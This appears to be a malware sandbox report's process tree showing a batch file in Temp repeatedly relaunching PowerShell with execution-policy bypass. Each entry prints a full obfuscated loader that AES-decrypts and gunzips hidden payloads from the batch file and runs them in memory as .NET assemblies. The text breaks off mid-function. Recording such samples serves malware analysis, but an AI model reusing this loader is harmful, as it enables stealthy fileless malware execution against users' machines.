        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        110⤵
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        108⤵
        
        PID:1428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        109⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2496
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        107⤵
        
        PID:352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        108⤵
        
        PID:2972
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        106⤵
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        107⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        105⤵
        
        PID:2120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        106⤵
        
        PID:2636
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        104⤵
        
        PID:300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        105⤵
        
        PID:2540
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        103⤵
        
        PID:2184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        104⤵
        
        PID:848
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        102⤵
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        103⤵
        
        PID:2984
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        101⤵
        
        PID:792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        102⤵
        
        PID:612
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        100⤵
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        101⤵
        
        PID:2392
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        99⤵
        
        PID:2228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        100⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2180
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        98⤵
        
        PID:1452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        99⤵
        
        PID:1792
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        97⤵
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ 